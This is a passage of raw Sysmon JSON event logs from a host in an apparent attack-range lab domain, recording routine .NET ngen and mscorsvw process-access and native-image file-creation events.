osoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6660,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.542\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E4C50C00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.542","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E4C50C00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6661,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.558\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E4C50C00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.558","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E4C50C00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6662,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:19.730\r\nProcessGuid: {A837DB8D-047B-5F25-0000-0010E4C50C00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1230-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 05:58:19.730","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:19.730","ProcessGuid":"{A837DB8D-047B-5F25-0000-0010E4C50C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1230-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 05:58:19.730","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6663,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.745\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.745","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6664,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.745\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.745","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6665,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.761\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010D0C90C00}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.761","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010D0C90C00}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6666,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.777\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6667,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.792\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nTargetProcessId: 4460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.792","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","TargetProcessId":"4460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
